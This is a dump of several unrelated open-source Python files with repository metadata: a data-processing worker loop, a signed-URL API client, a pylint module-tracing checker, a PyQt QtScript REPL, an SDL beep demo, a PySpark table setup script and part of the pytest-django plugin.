are worked on until no more new data are provided.
If new data is given, before the previously provided data
was done, the previous data will be skipped.
When working one data item finishes, observers will
receive a 'work_finished' notification, and can obtain
the data object including the results via the
:py:meth:`data` property. The results can be accessed
as tool specific data attributes.
The main motivation for this method is to work on data from
a data loop (like a webcam or a video) in real-time, always
working on the most recent data available.
"""
LOG.info("Worker for Tool '%s' (ready=%s, prepared=%s) "
"works on data: %r",
self.tool and self.tool.key, self.ready,
self.tool is not None and self.tool.prepared, data)
if self.ready and not self.busy:
self._next_data = data
self._work(**kwargs)
else:
self._next_data = data
# FIXME[bug/concept]: additional **kwargs arguments are ignored!
@busy("working")
# FIXME[hack/bug]: if queueing is enabled, we are not really busy ...
# (that is we are busy, but nevertheless accepting more work)
def _work(self, stepwise: bool = False, **kwargs):
"""The implementation of the work loop. This method
is assumed to run in a background thread. It will
check the property `_next_data` for fresh data and
if present, it will hand (a copy) of this data to the
detector and otherwise it will end the loop.
The data object passed to the detector will also
be stored as attribute (using the unique key of the detector
as attribute name) in the original data passed to the
detector. The results of the detector will be stored
in detector data under the attribute `detections`.
"""
while self._next_data is not None:
data = self._next_data
LOG.info("Working on next data (%r) with Tool %s.",
data, self._tool)
self._data = data
self.change(data_changed=True)
with self.failure_manager(catch=True):
result = self.tool.external_result + ('duration', )
LOG.debug("Worker %r applying tool %r on data %r "
"with result %s.", self, self.tool, data, result)
if stepwise:
for values in self.tool.steps(data, result=result,
**kwargs):
self.tool.add_data_attributes(data, result, values)
self.change(work_step=True)
else:
self.tool.apply(data, result=result, **kwargs)
self.change(work_finished=True)
if self._next_data is data:
self._next_data = None
LOG.info("Working on data (%r/%r) with Tool %s finished.",
data, self._data, self._tool)
# FIXME[bug]: In case of an error, we may also cause some Qt error here:
# QObject::connect: Cannot queue arguments of type 'QTextBlock'
# (Make sure 'QTextBlock' is registered using qRegisterMetaType().)
# QObject::connect: Cannot queue arguments of type 'QTextCursor'
# (Make sure 'QTextCursor' is registered using qRegisterMetaType().)
# This happens for example when the face panel is shown and a too
# small image (244x244x3) is causing an error in the 'haar' detector.
# The source of this messages is not clear to me yet (I have also
# seen it at other locations ...)
def _apply_tool(self, data, **kwargs) -> None:
self.tool.apply(self, data, **kwargs)
#
# Tool observer
#
def tool_changed(self, _tool: Tool, _info: Tool.Change) -> None:
"""React to a change of the :py:class:`Tool` by reworking
the current :py:class:`Data`.
"""
if self._data is None:
return # nothing to do ...
# FIXME[todo]: what tool changes would require a recomputation
# - info.busy_change should not do this ...
# if info.state_changed
# if self._data is not None:
# self.work(self._data)
| {
"repo_name": "Petr-By/qtpyvis",
"path": "dltb/tool/worker.py",
"copies": "1",
"size": "8068",
"license": "mit",
"hash": 990465609121850400,
"line_mean": 38.7438423645,
"line_max": 78,
"alpha_frac": 0.5941993059,
"autogenerated": false,
"ratio": 4.2196652719665275,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5313864577866527,
"avg_score": null,
"num_lines": null
} |
# Released subject to the BSD License
from functools import wraps
import json
import socket
import six
import apysigner
if six.PY2:
from urllib import urlencode
from urllib2 import HTTPError, urlopen
from urlparse import parse_qs
else:
from urllib.request import urlopen
from urllib.parse import parse_qs, urlencode
from urllib.error import HTTPError
__all__ = (
'api_request',
'SignedAPIRequest',
'BaseResponse',
'JSONApiResponse',
)
class BaseResponse(object):
"""
Thin wrapper around response that comes back from urlopen.
Mainly just so you can easily extend the response if desired.
Note that this response is not EXACTLY like a response you'd normally
get from urlopen. It cannot be used as a drop in replacement.
"""
_content = None
def __init__(self, response):
self.original_response = response
@property
def code(self):
return self.original_response.code
@property
def is_success(self):
# According to RFC 2616, "2xx" code indicates that the client's
# request was successfully received, understood, and accepted.
return self.code // 100 == 2
@property
def content(self):
"""
Returns raw response content.
"""
if self._content is None:
self._content = self.original_response.read()
return self._content
class APIRequest(object):
"""
API method decorator to turn method into easy API call.
Assumes parent class has "HOST_NAME" defined.
"""
def __init__(self, endpoint, method="GET", timeout=socket._GLOBAL_DEFAULT_TIMEOUT, response_class=None):
"""
:param endpoint:
URL endpoint for request.
:param method:
HTTP method for request.
:param timeout:
Timeout in seconds.
:param response_class:
Response class to wrap response in. If not provided will use standard response from urlopen,
or standard HttpError if received.
"""
self.endpoint = endpoint
self.method = method
self.response_class = response_class
self.TIMEOUT = timeout
def __call__(self, method):
"""
Method being wrapped should only return data to be used for
API call. The api_request takes that data, urlencodes it and
makes the proper get or post request to the specified endpoint.
"""
@wraps(method)
def _inner(cls, *args, **kwargs):
try:
method_data = method(cls, *args, **kwargs)
url, query_data = self._get_url_and_data(method_data, cls)
response = self._open_url(url, query_data)
except HTTPError as e:
response = e
return self.prepare_response(response, cls)
return _inner
def _get_url_and_data(self, method_data, cls):
"""
Returns url and data ready to make request.
:param method_data:
The data returned from the wrapped method call
:param cls:
The API class object being decorated.
"""
url = cls.HOST_NAME + self.endpoint
query_data = method_data and urlencode(method_data, doseq=1)
if self.method == "GET" and query_data:
url += "?" + query_data
query_data = None
return url, query_data
def _open_url(self, url, query_data):
return urlopen(url, data=query_data, timeout=self.TIMEOUT)
def prepare_response(self, response, cls):
"""
Prepares API response for final return.
:param response:
The raw response returned from ``urlopen``
:param cls:
The API class object being decorated.
"""
custom_response = self.response_class or getattr(cls, "RESPONSE_CLASS", None)
if custom_response:
return custom_response(response)
else:
return response
api_request = APIRequest
class SignedURLMixin(object):
CLIENT_PARAM_NAME = 'ClientId'
SIGNATURE_PARAM_NAME = 'Signature'
CLIENT_ID = ''
PRIVATE_KEY = ''
def _open_url(self, url, query_data):
"""
Don't sign until last step before opening url
"""
url = self._get_signed_url(url, query_data)
return urlopen(url, data=query_data, timeout=self.TIMEOUT)
def _get_signed_url(self, url, query_data):
# Currently limited to kinds of data that are key=value pairs.
# Binary data is not supported.
url_with_client = self._get_url_with_client(url)
payload = query_data and parse_qs(query_data)
signature = apysigner.get_signature(self.PRIVATE_KEY, url_with_client, payload)
return url_with_client + "&{0}={1}".format(self.SIGNATURE_PARAM_NAME, signature)
def _get_url_with_client(self, url):
url_conjunction = "&" if "?" in url else "?"
return url + "{url_conj}{param_name}={client_id}".format(
url_conj=url_conjunction,
param_name=self.CLIENT_PARAM_NAME,
client_id=self.CLIENT_ID,
)
class SignedAPIRequest(SignedURLMixin, APIRequest):
"""
Signs an API request.
You can subclass this and then use that as your decorator.
class MySignedAPI(SignedAPIRequest):
CLIENT_ID = "client-id"
PRIVATE_KEY = "UHJpdmF0ZSBLZXk="
signed_request = MySignedAPI
@signed_request('/something/good', method='POST')
def post_something():
return {'good_thing': 'babies'}
"""
class BaseAPIClient(object):
"""
It's not always convenient to wrap the class with a method to use for calling your api.
This class provides a little more extensible class to work with.
You must have a "HOST_NAME" defined on the class.
USAGE:
client = BaseClient()
response = client.fetch_response("/do-something", method="GET", times=5)
See tests for additional examples
"""
HOST_NAME = None
RESPONSE_CLASS = None
TIMEOUT = socket._GLOBAL_DEFAULT_TIMEOUT
def _get_url_and_data(self, endpoint, method, data):
"""
Returns url and data ready to make request.
:param endpoint:
A string of the url endpoint for the request.
:param method:
A string of the HTTP Method to use. (GET/POST)
:param data:
A dictionary of data to use with the request
"""
url = self.HOST_NAME + endpoint
query_data = data and urlencode(data, doseq=1)
if method == "GET" and query_data:
url += "?" + query_data
query_data = None
return url, query_data
def _open_url(self, url, query_data):
if query_data:
query_data = query_data.encode()
return urlopen(url, data=query_data, timeout=self.TIMEOUT)
def fetch_response(self, endpoint, method="GET", data=None):
"""
Main Method that fetches url.
:param endpoint:
The string value of url endpoint. It will get combined with the 'HOST_NAME' from the class
:param method:
A string of the HTTP method to use. Must be upper case.
:param **data:
keyword arguments for all data items to be used to make the request.
"""
try:
url, query_data = self._get_url_and_data(endpoint, method, data or None)
response = self._open_url(url, query_data)
except HTTPError as e:
response = e
return self.RESPONSE_CLASS and self.RESPONSE_CLASS(response) or response
class BaseSignedAPIClient(SignedURLMixin, BaseAPIClient):
"""
Base client that signs urls
"""
class JSONApiResponse(BaseResponse):
"""
Loads JSON object from Response.
You still need to be careful that the response is a json string in the
first place (you didn't get some crazy non-json error)
"""
_json = None
def json(self):
if self._json is None:
content = self.content
if isinstance(content, bytes):
content = content.decode("utf-8")
self._json = json.loads(content)
return self._json
| {
"repo_name": "madisona/apyclient",
"path": "apyclient.py",
"copies": "1",
"size": "8330",
"license": "bsd-2-clause",
"hash": 4961916930852017000,
"line_mean": 29.2909090909,
"line_max": 108,
"alpha_frac": 0.61272509,
"autogenerated": false,
"ratio": 4.167083541770886,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5279808631770886,
"avg_score": null,
"num_lines": null
} |
"""A pylint checker that simply records what module it's visiting.
This helps diagnose problems with pylint not running on all files.
To use, define an environment variable PYLINT_RECORD_FILES, with a value of
a file name to write them to:
set PYLINT_RECORD_FILES=pylinted_files.txt
"""
import os
from pylint.checkers import BaseChecker
from pylint.interfaces import IAstroidChecker
from .common import BASE_ID, check_visitors
FILENAME = os.environ.get("PYLINT_RECORD_FILES", "")
def register_checkers(linter):
"""Register checkers."""
if FILENAME:
linter.register_checker(ModuleTracingChecker(linter))
@check_visitors
class ModuleTracingChecker(BaseChecker):
"""
Not really a checker, it doesn't generate any messages. There's probably
a better way to hook into pylint to do this.
"""
__implements__ = (IAstroidChecker,)
name = "module-tracing-checker"
msgs = {("E%d00" % BASE_ID): ("bogus", "bogus", "bogus")}
def visit_module(self, node):
"""Called for each module being examined."""
with open(FILENAME, "a") as f:
f.write(node.file)
f.write("\n")
| {
"repo_name": "edx/edx-lint",
"path": "edx_lint/pylint/module_trace.py",
"copies": "1",
"size": "1161",
"license": "apache-2.0",
"hash": -5230543545976911000,
"line_mean": 24.2391304348,
"line_max": 77,
"alpha_frac": 0.6838931955,
"autogenerated": false,
"ratio": 3.6624605678233437,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.48463537633233433,
"avg_score": null,
"num_lines": null
} |
"""a pyqt test app that embeds javascript using QtScript,
defines qt properties and slots in py, and exposes them to js"""
import sys
from PyQt4 import QtGui, QtCore
from PyQt4.QtScript import QScriptEngine, QScriptValue
from PyQt4.QtCore import QObject, pyqtSignature, pyqtProperty, QVariant, QTimer
ps1 = ">>> "
ps2 = "... "
def printhello():
print "Hello."
app = QtGui.QApplication(sys.argv)
window = QtGui.QWidget()
# Create our main window using a plain QWidget.
window.setWindowTitle("Signals")
# Set our window's title as "Signals".
button = QtGui.QPushButton("Press", window)
# Create, with "Press" as its caption,
# a child button in the window.
# By specifying a parent object,
# this new widget is automatically added to the same.
button.resize(200, 40)
# Resize our button to (200, 40) -> (X, Y)
"""old style signals, works in pyqt 4.4"""
#button.connect(button, QtCore.SIGNAL("clicked()"), printhello) #QtCore.SLOT("quit()"))
#new style signals in 4.5, must upgdate to get these
button.clicked.connect(printhello)
# Connect the button's click signal to the QApplication's quit() slot.
window.show()
# Show our window.
class Python(QObject):
def __init__(self):
QObject.__init__(self)
self.setObjectName("python")
# Does not work as expected :(
self.setProperty("app", QVariant(self))
self.t = QTimer(self)
self.t.setObjectName("timer")
@pyqtSignature("QString")
def hello(self, name):
print "Hello,", name
def get_test(self):
return 123
test = pyqtProperty("int", get_test)
engine = QScriptEngine()
engine.evaluate("function dir(obj) { for(o in obj) print(o); }")
py = Python()
spy = engine.newQObject(py)
engine.globalObject().setProperty("python", spy)
#app.exec_()
print "Ctrl+D to quit"
prompt = ps1
code = ""
while True:
app.processEvents()
line = raw_input(prompt)
if not line.strip():
continue
code = code + line + "\n"
if engine.canEvaluate(code):
result = engine.evaluate(code)
if engine.hasUncaughtException():
bt = engine.uncaughtExceptionBacktrace()
print "Traceback:"
print "\n".join([" %s" % l for l in list(bt)])
print engine.uncaughtException().toString()
else:
print result.toString()
code = ""
prompt = ps1
else:
prompt = ps2
| {
"repo_name": "antont/tundra",
"path": "src/Application/JavascriptModule/proto/qtscript_test.py",
"copies": "1",
"size": "2402",
"license": "apache-2.0",
"hash": -7739511824187191000,
"line_mean": 26.6091954023,
"line_max": 87,
"alpha_frac": 0.6523730225,
"autogenerated": false,
"ratio": 3.5904334828101643,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9725404770491666,
"avg_score": 0.0034803469636996267,
"num_lines": 87
} |
# A PySDL port of some C++ code I found linked to in a couple of
# places. The original website is down, but it's available on the
# Wayback Machine here:
# https://web.archive.org/web/20120313055436/http://www.dgames.org/beep-sound-with-sdl/
# Unfortunately, I couldn't find the name of the author. He didn't
# have it on his website, and I can't download the original source
# file, so I don't know if he put it in there.
# The original transcription of the code to Python and ctypes didn't
# immediately work, but with tweaking it was the first time I managed
# to get generated sound to work.
import math
from sdl2 import *
from ctypes import *
AMPLITUDE = 128
FREQUENCY = 44100
CHANNELS = 2
class BeepObject():
def __init__(self, freq, samplesLeft):
self.freq = freq
self.samplesLeft = samplesLeft
class Beeper():
def __init__(self):
self.v = 0
self.beeps = []
ac_func = SDL_AudioCallback(self.audio_callback)
self.spec = SDL_AudioSpec(freq=FREQUENCY,
aformat=AUDIO_S8,
channels=CHANNELS,
samples=4096,
callback=ac_func)
def beep(self, freq, duration):
bo = BeepObject(freq, int(duration * (FREQUENCY / 1000)))
SDL_LockAudio()
self.beeps.insert(0, bo)
SDL_UnlockAudio()
def wait(self):
while True:
SDL_Delay(20)
SDL_LockAudio()
size = len(self.beeps)
SDL_UnlockAudio()
if not size > 0:
break
def audio_callback(self, userdata, stream, length):
i = 0
length = int(length / CHANNELS)
while i < length:
if not self.beeps:
for i in range(length):
for c in range(CHANNELS):
stream[i*CHANNELS+c] = c_ubyte(0)
return
bo = self.beeps[-1]
samplesToDo = min(i + bo.samplesLeft, length);
bo.samplesLeft -= samplesToDo - i
while i < samplesToDo:
sample = int(AMPLITUDE * math.sin(self.v * 2 * math.pi / FREQUENCY))
for c in range(CHANNELS):
stream[i*CHANNELS+c] = c_ubyte(sample)
i += 1
self.v += bo.freq
if bo.samplesLeft == 0:
self.beeps.pop()
if __name__ == '__main__':
if SDL_Init(SDL_INIT_AUDIO) != 0:
raise RuntimeError("Cannot initialize audio system: {}".format(SDL_GetError()))
duration = 50
D = 293.665
E = 329.628
F = 349.228
G = 391.995
A = 440.000
B = 493.883
c = 554.365
d = 587.330
b = Beeper()
devid = SDL_OpenAudioDevice(None, 0, b.spec, b.spec, 0)
b.beep(G, duration)
b.beep(G, duration)
b.beep(A, duration)
b.beep(A, duration)
b.beep(B, duration)
b.beep(A, duration)
b.beep(G, duration)
b.beep(F, duration)
b.beep(A, duration)
b.beep(G, duration)
b.beep(F, duration)
b.beep(G, duration)
b.beep(G, duration)
b.beep(G, duration)
b.beep(A, duration)
b.beep(A, duration)
b.beep(B, duration)
b.beep(A, duration)
b.beep(G, duration)
b.beep(F, duration)
SDL_PauseAudioDevice(devid, 0)
b.wait()
SDL_CloseAudioDevice(devid)
SDL_Quit(SDL_INIT_AUDIO) | {
"repo_name": "MageJohn/CHIP8",
"path": "soundtests/sdl_soundtest.py",
"copies": "1",
"size": "3434",
"license": "mit",
"hash": -2191670305280312000,
"line_mean": 25.4230769231,
"line_max": 87,
"alpha_frac": 0.5521258008,
"autogenerated": false,
"ratio": 3.4169154228855723,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.44690412236855726,
"avg_score": null,
"num_lines": null
} |
"""A PySpark driver that creates Spark tables for Spark SQL benchmark.
It takes an HCFS directory and a list of the names of the subdirectories of that
root directory. The subdirectories each hold Parquet data and are to be
converted into a table of the same name. The subdirectories are explicitly
providing because listing HCFS directories in PySpark is ugly.
sys.argv[1]: The root HCFS directory
sys.argv[2]: A comma separated list of the subdirectories/table names
"""
import argparse
import logging
import os
from pyspark.sql import SparkSession
from pyspark.sql.utils import AnalysisException
def main():
parser = argparse.ArgumentParser()
parser.add_argument('root_dir')
parser.add_argument('tables', type=lambda csv: csv.split(','))
args = parser.parse_args()
spark = (SparkSession.builder
.appName('Setup Spark tables')
.enableHiveSupport()
.getOrCreate())
for table in args.tables:
logging.info('Creating table %s', table)
table_dir = os.path.join(args.root_dir, table)
# clean up previous table
spark.sql('DROP TABLE IF EXISTS ' + table)
# register new table
spark.catalog.createTable(table, table_dir, source='parquet')
try:
# This loads the partitions under the table if table is partitioned.
spark.sql('MSCK REPAIR TABLE ' + table)
except AnalysisException:
# The table was not partitioned, which was presumably expected
pass
# Compute column statistics. Spark persists them in the TBL_PARAMS table of
# the Hive Metastore. I do not believe this interoperates with Hive's own
# statistics. See
# https://jaceklaskowski.gitbooks.io/mastering-spark-sql/content/spark-sql-LogicalPlan-AnalyzeColumnCommand.html
columns = ','.join(spark.table(table).columns)
spark.sql(
'ANALYZE TABLE {} COMPUTE STATISTICS FOR COLUMNS {}'.format(
table, columns))
if __name__ == '__main__':
main()
| {
"repo_name": "GoogleCloudPlatform/PerfKitBenchmarker",
"path": "perfkitbenchmarker/scripts/spark_sql_test_scripts/spark_table.py",
"copies": "1",
"size": "1944",
"license": "apache-2.0",
"hash": -2075883749000230700,
"line_mean": 37.1176470588,
"line_max": 116,
"alpha_frac": 0.7139917695,
"autogenerated": false,
"ratio": 3.9592668024439917,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5173258571943992,
"avg_score": null,
"num_lines": null
} |
"""A py.test plugin which helps testing Django applications
This plugin handles creating and destroying the test environment and
test database and provides some useful text fixtues.
"""
import os
import sys
import pytest
from .django_compat import is_django_unittest
from .fixtures import (_django_db_setup, db, transactional_db, client,
admin_client, rf, settings, live_server,
_live_server_helper)
from .lazy_django import skip_if_no_django, django_settings_is_configured
(_django_db_setup, db, transactional_db, client, admin_client, rf,
settings, live_server, _live_server_helper)
SETTINGS_MODULE_ENV = 'DJANGO_SETTINGS_MODULE'
CONFIGURATION_ENV = 'DJANGO_CONFIGURATION'
################ pytest hooks ################
def pytest_addoption(parser):
group = parser.getgroup('django')
group._addoption('--reuse-db',
action='store_true', dest='reuse_db', default=False,
help='Re-use the testing database if it already exists, '
'and do not remove it when the test finishes. This '
'option will be ignored when --no-db is given.')
group._addoption('--create-db',
action='store_true', dest='create_db', default=False,
help='Re-create the database, even if it exists. This '
'option will be ignored if not --reuse-db is given.')
group._addoption('--ds',
action='store', type='string', dest='ds', default=None,
help='Set DJANGO_SETTINGS_MODULE.')
group._addoption('--dc',
action='store', type='string', dest='dc', default=None,
help='Set DJANGO_CONFIGURATION.')
parser.addini(CONFIGURATION_ENV,
'django-configurations class to use by pytest-django.')
group._addoption('--liveserver', default=None,
help='Address and port for the live_server fixture.')
parser.addini(SETTINGS_MODULE_ENV,
'Django settings module to use by pytest-django.')
def _load_settings(config, options):
# Configure DJANGO_SETTINGS_MODULE
ds = (options.ds or
config.getini(SETTINGS_MODULE_ENV) or
os.environ.get(SETTINGS_MODULE_ENV))
# Configure DJANGO_CONFIGURATION
dc = (options.dc or
config.getini(CONFIGURATION_ENV) or
os.environ.get(CONFIGURATION_ENV))
if ds:
os.environ[SETTINGS_MODULE_ENV] = ds
if dc:
os.environ[CONFIGURATION_ENV] = dc
# Install the django-configurations importer
import configurations.importer
configurations.importer.install()
from django.conf import settings
try:
settings.DATABASES
except ImportError:
e = sys.exc_info()[1]
raise pytest.UsageError(*e.args)
if pytest.__version__[:3] >= "2.4":
def pytest_load_initial_conftests(early_config, parser, args):
_load_settings(early_config, parser.parse_known_args(args))
def pytest_configure(config):
# Register the marks
config.addinivalue_line(
'markers',
'django_db(transaction=False): Mark the test as using '
'the django test database. The *transaction* argument marks will '
"allow you to use real transactions in the test like Django's "
'TransactionTestCase.')
config.addinivalue_line(
'markers',
'urls(modstr): Use a different URLconf for this test, similar to '
'the `urls` attribute of Django `TestCase` objects. *modstr* is '
'a string specifying the module of a URL config, e.g. '
'"my_app.test_urls".')
if pytest.__version__[:3] < "2.4":
_load_settings(config, config.option)
################ Autouse fixtures ################
@pytest.fixture(autouse=True, scope='session')
def _django_test_environment(request):
"""
Ensure that Django is loaded and has its testing environment setup
XXX It is a little dodgy that this is an autouse fixture. Perhaps
an email fixture should be requested in order to be able to
use the Django email machinery just like you need to request a
db fixture for access to the Django database, etc. But
without duplicating a lot more of Django's test support code
we need to follow this model.
"""
if django_settings_is_configured():
from django.conf import settings
from .compat import (setup, setup_test_environment,
teardown_test_environment)
settings.DEBUG = False
setup()
setup_test_environment()
request.addfinalizer(teardown_test_environment)
@pytest.fixture(autouse=True, scope='session')
def _django_cursor_wrapper(request):
"""The django cursor wrapper, internal to pytest-django
This will globally disable all database access. The object
returned has a .enable() and a .disable() method which can be used
to temporarily enable database access.
"""
if django_settings_is_configured():
# util -> utils rename in Django 1.7
try:
import django.db.backends.utils
utils_module = django.db.backends.utils
except ImportError:
import django.db.backends.util
utils_module = django.db.backends.util
manager = CursorManager(utils_module)
manager.disable()
else:
manager = CursorManager()
return manager
@pytest.fixture(autouse=True)
def _django_db_marker(request):
"""Implement the django_db marker, internal to pytest-django
This will dynamically request the ``db`` or ``transactional_db``
fixtures as required by the django_db marker.
"""
marker = request.keywords.get('django_db', None)
if marker:
validate_django_db(marker)
if marker.transaction:
request.getfuncargvalue('transactional_db')
else:
request.getfuncargvalue('db')
@pytest.fixture(autouse=True)
def _django_setup_unittest(request, _django_cursor_wrapper):
"""Setup a django unittest, internal to pytest-django"""
if django_settings_is_configured() and is_django_unittest(request.node):
request.getfuncargvalue('_django_test_environment')
request.getfuncargvalue('_django_db_setup')
_django_cursor_wrapper.enable()
request.addfinalizer(_django_cursor_wrapper.disable)
@pytest.fixture(autouse=True, scope='function')
def _django_clear_outbox(request):
"""Clear the django outbox, internal to pytest-django"""
if django_settings_is_configured():
from django.core import mail
mail.outbox = []
@pytest.fixture(autouse=True, scope='function')
def _django_set_urlconf(request):
"""Apply the @pytest.mark.urls marker, internal to pytest-django"""
marker = request.keywords.get('urls', None)
if marker:
skip_if_no_django()
import django.conf
from django.core.urlresolvers import clear_url_caches
validate_urls(marker)
original_urlconf = django.conf.settings.ROOT_URLCONF
django.conf.settings.ROOT_URLCONF = marker.urls
clear_url_caches()
def restore():
django.conf.settings.ROOT_URLCONF = original_urlconf
request.addfinalizer(restore)
################ Helper Functions ################
class CursorManager(object):
"""Manager for django.db.backends.util.CursorWrapper
This is the object returned by _django_cursor_wrapper.
If created with None as django.db.backends.util the object is a
no-op.
"""
def __init__(self, dbutil=None):
self._dbutil = dbutil
if dbutil:
self._orig_wrapper = dbutil.CursorWrapper
def _blocking_wrapper(*args, **kwargs):
__tracebackhide__ = True
__tracebackhide__ # Silence pyflakes
pytest.fail('Database access not allowed, '
'use the "django_db" mark to enable')
def enable(self):
"""Enable access to the django database"""
if self._dbutil:
self._dbutil.CursorWrapper = self._orig_wrapper
def disable(self):
if self._dbutil:
self._dbutil.CursorWrapper = self._blocking_wrapper
def __enter__(self):
self.enable()
def __exit__(self, exc_type, exc_value, traceback):
self.disable()
def validate_django_db(marker):
"""This function validates the django_db marker
It checks the signature and creates the `transaction` attribute on
the marker which will have the correct value.
"""
def apifun(transaction=False):
marker.transaction = transaction
apifun(*marker.args, **marker.kwargs)
def validate_urls(marker):
"""This function validates the urls marker
It checks the signature and creates the `urls` attribute on the
marker which will have the correct value.
"""
def apifun(urls):
marker.urls = urls
apifun(*marker.args, **marker.kwargs)
| {
"repo_name": "blueyed/pytest_django",
"path": "pytest_django/plugin.py",
"copies": "1",
"size": "9091",
"license": "bsd-3-clause",
"hash": 8742814361490536000,
"line_mean": 32.4227941176,
"line_max": 79,
"alpha_frac": 0.6342536575,
"autogenerated": false,
"ratio": 4.20295885344429,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.533721251094429,
"avg_score": null,
"num_lines": null
} |
"""A py.test plugin which helps testing Django applications
This plugin handles creating and destroying the test environment and
test database and provides some useful text fixtures.
"""
import contextlib
import inspect
from functools import reduce
import os
import sys
import types
import py
import pytest
from .django_compat import is_django_unittest
from .fixtures import (_django_db_setup, _live_server_helper, admin_client,
admin_user, client, db, django_user_model,
django_username_field, live_server, rf, settings,
transactional_db)
from .lazy_django import django_settings_is_configured, skip_if_no_django
# Silence linters for imported fixtures.
(_django_db_setup, _live_server_helper, admin_client, admin_user, client, db,
django_user_model, django_username_field, live_server, rf, settings,
transactional_db)
SETTINGS_MODULE_ENV = 'DJANGO_SETTINGS_MODULE'
CONFIGURATION_ENV = 'DJANGO_CONFIGURATION'
INVALID_TEMPLATE_VARS_ENV = 'FAIL_INVALID_TEMPLATE_VARS'
# ############### pytest hooks ################
def pytest_addoption(parser):
group = parser.getgroup('django')
group._addoption('--reuse-db',
action='store_true', dest='reuse_db', default=False,
help='Re-use the testing database if it already exists, '
'and do not remove it when the test finishes. This '
'option will be ignored when --no-db is given.')
group._addoption('--create-db',
action='store_true', dest='create_db', default=False,
help='Re-create the database, even if it exists. This '
'option will be ignored if not --reuse-db is given.')
group._addoption('--ds',
action='store', type='string', dest='ds', default=None,
help='Set DJANGO_SETTINGS_MODULE.')
group._addoption('--dc',
action='store', type='string', dest='dc', default=None,
help='Set DJANGO_CONFIGURATION.')
group._addoption('--nomigrations',
action='store_true', dest='nomigrations', default=False,
help='Disable Django 1.7 migrations on test setup')
group._addoption('--no-force-no-debug',
action='store_true', dest='noforcenodebug', default=False,
help='Disable forcing DEBUG setting to False on test setup')
parser.addini(CONFIGURATION_ENV,
'django-configurations class to use by pytest-django.')
group._addoption('--liveserver', default=None,
help='Address and port for the live_server fixture.')
parser.addini(SETTINGS_MODULE_ENV,
'Django settings module to use by pytest-django.')
parser.addini('django_find_project',
'Automatically find and add a Django project to the '
'Python path.',
default=True)
group._addoption('--fail-on-template-vars',
action='store_true', dest='itv', default=False,
help='Fail for invalid variables in templates.')
parser.addini(INVALID_TEMPLATE_VARS_ENV,
'Fail for invalid variables in templates.',
default=False)
def _exists(path, ignore=EnvironmentError):
try:
return path.check()
except ignore:
return False
PROJECT_FOUND = ('pytest-django found a Django project in %s '
'(it contains manage.py) and added it to the Python path.\n'
'If this is wrong, add "django_find_project = false" to '
'pytest.ini and explicitly manage your Python path.')
PROJECT_NOT_FOUND = ('pytest-django could not find a Django project '
'(no manage.py file could be found). You must '
'explicitly add your Django project to the Python path '
'to have it picked up.')
PROJECT_SCAN_DISABLED = ('pytest-django did not search for Django '
'projects since it is disabled in the configuration '
'("django_find_project = false")')
@contextlib.contextmanager
def _handle_import_error(extra_message):
try:
yield
except ImportError as e:
django_msg = (e.args[0] + '\n\n') if e.args else ''
msg = django_msg + extra_message
raise ImportError(msg)
def _add_django_project_to_path(args):
args = [x for x in args if not str(x).startswith("-")]
if not args:
args = [py.path.local()]
for arg in args:
arg = py.path.local(arg)
for base in arg.parts(reverse=True):
manage_py_try = base.join('manage.py')
if _exists(manage_py_try):
sys.path.insert(0, str(base))
return PROJECT_FOUND % base
return PROJECT_NOT_FOUND
def _setup_django():
import django
if hasattr(django, 'setup'):
django.setup()
else:
# Emulate Django 1.7 django.setup() with get_models
from django.db.models import get_models
get_models()
def _parse_django_find_project_ini(x):
if x in (True, False):
return x
x = x.lower()
possible_values = {'true': True,
'false': False,
'1': True,
'0': False}
try:
return possible_values[x]
except KeyError:
raise ValueError('%s is not a valid value for django_find_project. '
'It must be one of %s.'
% (x, ', '.join(possible_values.keys())))
def pytest_load_initial_conftests(early_config, parser, args):
# Register the marks
early_config.addinivalue_line(
'markers',
'django_db(transaction=False): Mark the test as using '
'the django test database. The *transaction* argument marks will '
"allow you to use real transactions in the test like Django's "
'TransactionTestCase.')
early_config.addinivalue_line(
'markers',
'urls(modstr): Use a different URLconf for this test, similar to '
'the `urls` attribute of Django `TestCase` objects. *modstr* is '
'a string specifying the module of a URL config, e.g. '
'"my_app.test_urls".')
options = parser.parse_known_args(args)
if options.version or options.help:
return
django_find_project = _parse_django_find_project_ini(
early_config.getini('django_find_project'))
if django_find_project:
_django_project_scan_outcome = _add_django_project_to_path(args)
else:
_django_project_scan_outcome = PROJECT_SCAN_DISABLED
# Configure FAIL_INVALID_TEMPLATE_VARS
itv = (options.itv or
os.environ.get(INVALID_TEMPLATE_VARS_ENV) in ['true', 'True', '1'] or
early_config.getini(INVALID_TEMPLATE_VARS_ENV))
if itv:
os.environ[INVALID_TEMPLATE_VARS_ENV] = 'true'
# Configure DJANGO_SETTINGS_MODULE
ds = (options.ds or
os.environ.get(SETTINGS_MODULE_ENV) or
early_config.getini(SETTINGS_MODULE_ENV))
# Configure DJANGO_CONFIGURATION
dc = (options.dc or
os.environ.get(CONFIGURATION_ENV) or
early_config.getini(CONFIGURATION_ENV))
if ds:
os.environ[SETTINGS_MODULE_ENV] = ds
if dc:
os.environ[CONFIGURATION_ENV] = dc
# Install the django-configurations importer
import configurations.importer
configurations.importer.install()
# Forcefully load django settings, throws ImportError or
# ImproperlyConfigured if settings cannot be loaded.
from django.conf import settings
with _handle_import_error(_django_project_scan_outcome):
settings.DATABASES
_setup_django()
def pytest_runtest_setup(item):
if django_settings_is_configured() and is_django_unittest(item):
cls = item.cls
if hasattr(cls, '__real_setUpClass'):
return
cls.__real_setUpClass = cls.setUpClass
cls.__real_tearDownClass = cls.tearDownClass
cls.setUpClass = types.MethodType(lambda cls: None, cls)
cls.tearDownClass = types.MethodType(lambda cls: None, cls)
@pytest.fixture(autouse=True, scope='session')
def _django_test_environment(request):
"""
Ensure that Django is loaded and has its testing environment setup.
XXX It is a little dodgy that this is an autouse fixture. Perhaps
an email fixture should be requested in order to be able to
use the Django email machinery just like you need to request a
db fixture for access to the Django database, etc. But
without duplicating a lot more of Django's test support code
we need to follow this model.
"""
if django_settings_is_configured():
_setup_django()
from django.conf import settings
from .compat import setup_test_environment, teardown_test_environment
